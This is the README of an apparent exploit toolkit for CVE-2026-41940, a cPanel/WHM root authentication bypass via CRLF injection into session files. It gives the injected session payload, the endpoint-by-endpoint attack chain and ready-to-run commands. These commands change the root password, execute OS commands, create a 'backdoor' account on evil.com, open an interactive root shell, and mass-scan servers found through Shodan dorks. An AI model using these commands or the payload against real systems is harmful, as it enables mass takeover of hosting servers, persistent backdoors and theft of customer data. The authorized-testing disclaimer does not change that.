Share
## https://sploitus.com/exploit?id=81E394B0-D826-571A-BAFD-EA6DCF409748
# CPANEL CVE EXPLOIT



**English** | **[ŲØ§ØąØģی (Persian)](README.fa.md)**

```
 ██████╗██████╗  █████╗ ███╗   ██╗███████╗██╗
██╔════╝██╔══██╗██╔══██╗████╗  ██║██╔════╝██║
██║     ██████╔╝███████║██╔██╗ ██║█████╗  ██║
██║     ██╔═══╝ ██╔══██║██║╚██╗██║██╔══╝  ██║
╚██████╗██║     ██║  ██║██║ ╚████║███████╗███████╗
 ╚═════╝╚═╝     ╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚══════╝

 ██████╗██╗   ██╗███████╗
██╔════╝██║   ██║██╔════╝
██║     ██║   ██║█████╗
██║     ╚██╗ ██╔╝██╔══╝
╚██████╗ ╚████╔╝ ███████╗
 ╚═════╝  ╚═══╝  ╚══════╝

███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
█████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝
```

[![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=for-the-badge&logo=python&logoColor=white)](https://www.python.org/)
[![CVE](https://img.shields.io/badge/CVE-2026--41940-critical?style=for-the-badge&logo=dependabot&logoColor=white)](https://nvd.nist.gov/)
[![CVSS](https://img.shields.io/badge/CVSS-10.0-red?style=for-the-badge)](https://www.first.org/cvss/)
[![License](https://img.shields.io/badge/License-MIT-green?style=for-the-badge)](LICENSE)
[![Stdlib](https://img.shields.io/badge/Dependencies-stdlib%20only-orange?style=for-the-badge)](requirements.txt)

**Automated scanner & post-exploitation toolkit for CVE-2026-41940 — cPanel & WHM root authentication bypass via session-file CRLF injection.**



---

## Table of Contents

- [Overview](#overview)
- [CVE Details](#cve-details)
- [How It Works](#how-it-works)
- [Features](#features)
- [Affected Versions](#affected-versions)
- [Requirements](#requirements)
- [Installation](#installation)
- [Quick Start](#quick-start)
- [Usage](#usage)
- [Post-Exploit Actions](#post-exploit-actions)
- [Interactive WHM Shell](#interactive-whm-shell)
- [Mass Scanning & Pipeline Integration](#mass-scanning--pipeline-integration)
- [Shodan Dorks](#shodan-dorks)
- [Output Format](#output-format)
- [Example Session](#example-session)
- [Legal Disclaimer](#legal-disclaimer)

---

## Overview

**CPANEL CVE EXPLOIT** is a single-file Python tool designed for **authorized security assessments** of cPanel & WHM servers vulnerable to **CVE-2026-41940**.

The vulnerability allows an unauthenticated remote attacker to poison WHM session files through CRLF injection in the `Authorization: Basic` header, bypassing authentication and gaining **root-level WHM access** without valid credentials.

| Property | Value |
|----------|-------|
| **CVE** | CVE-2026-41940 |
| **Severity** | Critical |
| **CVSS** | 10.0 |
| **Attack Vector** | Network / Unauthenticated |
| **Impact** | Full WHM root access |
| **Default Port** | `2087` (WHM) |
| **Status** | In-the-wild exploitation confirmed (Apr 2026) |

---

## CVE Details

### Root Cause

In vulnerable versions of cPanel & WHM, `saveSession()` in `Session.pm` calls `filter_sessiondata()` **after** writing the session file to disk. An attacker can inject CRLF (`\r\n`) characters through the HTTP `Authorization: Basic` header, which gets written directly into the on-disk session file — bypassing sanitization.

### Injected Session Fields

The tool uses a Base64-encoded payload that decodes to:

```
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
```

These fields simulate a fully authenticated root WHM session, including 2FA bypass (`tfa_verified=1`) and root privilege flag (`hasroot=1`).

### Fix

cPanel moved `filter_sessiondata()` to execute **before** the session write operation in `Session.pm`.

---

## How It Works

The exploit chain consists of **5 stages** (Stage 0–4):

```mermaid
flowchart TD
    A[Stage 0: Canonical Host Discovery] --> B[Stage 1: Mint Preauth Session]
    B --> C[Stage 2: CRLF Injection via Authorization Header]
    C --> D[Stage 3: Session Propagation via do_token_denied]
    D --> E[Stage 4: Verify Root Access via json-api/version]
    E --> F{Vulnerable?}
    F -->|Yes| G[Post-Exploit Actions / Interactive Shell]
    F -->|No| H[Skip Target]

    A -.- A1["GET /openid_connect/cpanelid → 307 redirect reveals real hostname"]
    B -.- B1["POST /login/?login_only=1 → whostmgrsession cookie"]
    C -.- C1["GET / + poisoned Basic auth → /cpsessXXXXXXXXXX token"]
    D -.- D1["GET /scripts2/listaccts → flush raw session to cache"]
    E -.- E1["GET /cpsessXXX/json-api/version → HTTP 200 + version JSON"]
```

| Stage | Endpoint | Purpose |
|-------|----------|---------|
| **0** | `/openid_connect/cpanelid` | Auto-discover canonical hostname via 307 redirect |
| **1** | `/login/?login_only=1` | Obtain preauth `whostmgrsession` cookie with wrong credentials |
| **2** | `/` | Inject CRLF-poisoned `Authorization: Basic` header into session file |
| **3** | `/scripts2/listaccts` | Trigger `do_token_denied` gadget to flush session to cache |
| **4** | `/{token}/json-api/version` | Confirm root access — HTTP 200 with version JSON |

---

## Features

| Feature | Description |
|---------|-------------|
| **Single-target scan** | Full exploit chain against one WHM URL |
| **Mass scanning** | Multi-threaded scanning from file or stdin |
| **Version detection** | Automatic patched/vulnerable version comparison |
| **Post-exploit API** | Password change, command exec, account listing, user creation |
| **Interactive shell** | Built-in WHM root shell with file read & API commands |
| **Selenium login** | Auto-inject session cookie into Chrome/Firefox |
| **Manual browser fallback** | Console JavaScript snippets for manual WHM login |
| **RCE check** | Quick `id` / `uname -a` verification after bypass |
| **JSON export** | Save all findings to structured JSON report |
| **Pipeline-ready** | Works with `httpx`, `subfinder`, `shodan`, and `awk` pipelines |
| **Stdlib only** | No pip dependencies required for core functionality |
| **Colorized output** | Real-time stage logging with severity indicators |

---

## Affected Versions

| Branch | Patched At | Status |
|--------|-----------|--------|
| 11.110.x | `11.110.0.97` | Vulnerable below patch |
| 11.118.x | `11.118.0.63` | Vulnerable below patch |
| 11.126.x | `11.126.0.54` | Vulnerable below patch |
| 11.132.x | `11.132.0.29` | Vulnerable below patch |
| 11.134.x | `11.134.0.20` | Vulnerable below patch |
| 11.136.x | `11.136.0.5` | Vulnerable below patch |

> **Note:** Targets running patched builds are automatically flagged and skipped during scanning.

---

## Requirements

### Core (required)

- **Python 3.8+**
- No external packages — uses Python standard library only

### Optional

| Package | Purpose |
|---------|---------|
| `selenium` | Browser auto-login (`--selenium`) |
| Chrome / Firefox | Browser engine for Selenium |

```bash
pip install -r requirements.txt   # optional — selenium only
```

---

## Installation

```bash
git clone https://github.com/YOUR_USERNAME/cpanel-cve-exploit.git
cd cpanel-cve-exploit
```

No build step required. Run directly:

```bash
python3 test-cve.py --help
```

---

## Quick Start

```bash
# Scan a single WHM target
python3 test-cve.py -u https://target.com:2087

# Scan with post-exploit: list all cPanel accounts
python3 test-cve.py -u https://target.com:2087 --action list

# Mass scan from file, 20 threads, save JSON report
python3 test-cve.py -l targets.txt -t 20 -o results.json
```

---

## Usage

```
usage: test-cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                   [-t THREADS] [--timeout TIMEOUT] [--rate-limit RATE_LIMIT]
                   [--action {list,passwd,cmd,exec,info,version,shell,adduser}]
                   [--passwd PASSWD] [--cmd CMD]
                   [--new-user NEW_USER] [--new-domain NEW_DOMAIN]
                   [--read-file READ_FILE] [--selenium]
                   [--engine {chrome,firefox}] [--browser] [--check-rce]
                   [-o OUTPUT] [--no-color]
```

### Target Options

| Flag | Description |
|------|-------------|
| `-u`, `--url` | Single target URL (e.g. `https://host:2087`) |
| `-l`, `--list` | File containing URLs, one per line |
| `--hostname` | Override canonical Host header (auto-discovered by default) |

### Scan Options

| Flag | Default | Description |
|------|---------|-------------|
| `-t`, `--threads` | `10` | Number of concurrent scan threads |
| `--timeout` | `15` | HTTP timeout in seconds |
| `--rate-limit` | `0` | Delay (seconds) between target submissions |

### Output Options

| Flag | Description |
|------|-------------|
| `-o`, `--output` | Save findings to JSON file |
| `--no-color` | Disable ANSI color output |

---

## Post-Exploit Actions

> Post-exploit flags work on **single targets only** (`-u`, not mass scan).

| Action | Flag | Description |
|--------|------|-------------|
| **Scan only** | *(default)* | Run exploit chain and report vulnerability |
| **List accounts** | `--action list` | List all cPanel accounts via WHM API |
| **Change password** | `--action passwd --passwd ` | Change root WHM password |
| **Execute command** | `--action cmd --cmd "id;whoami"` | Run OS command via WHM exec API |
| **Server info** | `--action info` | Gather hostname, load, disk, version |
| **Get version** | `--action version` | Fetch cPanel/WHM version via API |
| **Create account** | `--action adduser --new-user u --new-domain d.com --passwd p` | Create new cPanel account |
| **Interactive shell** | `--action shell` | Launch interactive WHM root shell |
| **RCE check** | `--check-rce` | Run `id;uname -a` after successful bypass |
| **Selenium login** | `--selenium [--engine chrome\|firefox]` | Auto-login to WHM dashboard in browser |
| **Manual browser** | `--browser` | Print JavaScript console commands for manual login |

### Examples

```bash
# Change root password after bypass
python3 test-cve.py -u https://target.com:2087 --action passwd --passwd 'P@ss2026!'

# Execute remote command
python3 test-cve.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"

# Create backdoor cPanel account
python3 test-cve.py -u https://target.com:2087 \
  --action adduser --new-user backdoor --new-domain evil.com --passwd 'TempPass2026!'

# Open interactive WHM shell
python3 test-cve.py -u https://target.com:2087 --action shell

# Auto-login via Chrome
python3 test-cve.py -u https://target.com:2087 --selenium --engine chrome

# Manual browser login (prints JS for DevTools console)
python3 test-cve.py -u https://target.com:2087 --browser
```

---

## Interactive WHM Shell

Launch with `--action shell` for a full interactive session:

```
root@target.com â–ķ help

  id / whoami / hostname / version  → server info
  ls [path]                         → file listing
  cat [path]                        → read file contents
  accounts                          → list cPanel accounts
  addadmin              → create WHM admin/reseller
  passwd                   → change root password
  exec                     → run OS command
  exit / quit                       → exit shell
```

**Example:**

```
root@192.168.1.100 â–ķ id
  uid=0(root) gid=0(root) groups=0(root)

root@192.168.1.100 â–ķ accounts
  user=webuser1          domain=example.com          email=admin@example.com
  user=webuser2          domain=test.com             email=info@test.com

root@192.168.1.100 â–ķ cat /etc/passwd

root@192.168.1.100 â–ķ exit
```

---

## Mass Scanning & Pipeline Integration

### From file

```bash
python3 test-cve.py -l targets.txt -t 20 -o results.json
```

### From stdin (pipe)

```bash
cat urls.txt | python3 test-cve.py

# subfinder + httpx pipeline
subfinder -d example.com -silent | httpx -p 2087 -silent | python3 test-cve.py -t 30

# Shodan pipeline
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | python3 test-cve.py -t 30 -o shodan_results.json
```

### Supported input formats

| Format | Example |
|--------|---------|
| Full URL | `https://192.168.1.1:2087` |
| IP + port | `192.168.1.1 2087` |
| Shodan output | Parsed automatically via regex |
| ANSI-colored output | Stripped automatically |

---

## Shodan Dorks

```
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
http.title:"WHM"
ssl:"cpanel" port:2087
```

---

## Output Format

Findings are saved as JSON when using `-o results.json`:

```json
{
  "scanner": "cPanelSniper v2.0",
  "cve": "CVE-2026-41940",
  "timestamp": "2026-05-23T12:00:00.000000",
  "findings": [
    {
      "severity": "CRIT",
      "title": "CVE-2026-41940 — cPanel & WHM Authentication Bypass",
      "target": "https://target.com:2087",
      "canonical": "server.target.com",
      "session": "root:SessionName",
      "token": "/cpsess1234567890",
      "version": "11.126.0.50",
      "api_url": "https://target.com:2087/cpsess1234567890/json-api/version",
      "evidence": "{\"version\":\"11.126.0.50\"...}",
      "cve": "CVE-2026-41940",
      "cvss": "10.0",
      "timestamp": "2026-05-23T12:00:05.000000"
    }
  ]
}
```

### Console summary

```
══════════════════════════════════════════════════════════════════════
  cPanelSniper — CVE-2026-41940 Scan Complete
  Time: 12.4s  ·  Targets: 50
──────────────────────────────────────────────────────────────────────

  ⚡ 2 VULNERABLE TARGET(S)

  Target   : https://victim1.com:2087
  Version  : 11.126.0.50
  Token    : /cpsess1234567890
  API URL  : https://victim1.com:2087/cpsess1234567890/json-api/version
  Evidence : {"version":"11.126.0.50"...}

══════════════════════════════════════════════════════════════════════
```

---

## Example Session

```bash
$ python3 test-cve.py -u https://target.com:2087

  Configuration:
   Targets  : 1
   Threads  : 10
   Timeout  : 15s
   Action   : scan only

12:00:01 [INFO] Canonical hostname discovered: server.target.com
12:00:02 [  OK] Stage1: preauth session = root:abc123...
12:00:03 [  OK] Stage2: HTTP 307 → token=/cpsess1234567890
12:00:04 [  OK] Stage3: HTTP 401 — do_token_denied gadget fired
12:00:05 [INFO] Stage4: HTTP 200  {"version":"11.126.0.50"...}
12:00:05 [PWND] CVE-2026-41940 CONFIRMED — WHM root access! (v11.126.0.50 — CONFIRMED vulnerable)
12:00:05 [PWND]   Token    : /cpsess1234567890
12:00:05 [PWND]   Session  : root:abc123...
12:00:05 [PWND]   Version  : 11.126.0.50
12:00:05 [PWND]   API URL  : https://target.com:2087/cpsess1234567890/json-api/version
```

---

## Project Structure

```
cpanel-cve-exploit/
├── test-cve.py        # Main scanner & exploit tool (single file)
├── requirements.txt   # Optional: selenium
├── README.md          # English documentation
└── README.fa.md       # Persian documentation (ŲØ§ØąØģی)
```

---

## Legal Disclaimer

> **FOR AUTHORIZED SECURITY TESTING ONLY**

This tool is provided for **educational and authorized penetration testing purposes only**.

- Only use against systems you **own** or have **explicit written permission** to test.
- Unauthorized access to computer systems is **illegal** under laws including the CFAA (US), Computer Misuse Act (UK), and equivalent legislation worldwide.
- In-the-wild exploitation of CVE-2026-41940 has been confirmed — patch affected systems immediately.
- The authors and contributors **accept no liability** for misuse of this software.

By using this tool, you agree to use it responsibly and in compliance with all applicable laws.

---

## References

- [CVE-2026-41940](https://nvd.nist.gov/) — NVD Entry
- cPanel Security Advisory — Session.pm CRLF injection patch
- WHM default port: `2087` (HTTPS)

---


  Built for security researchers · Use responsibly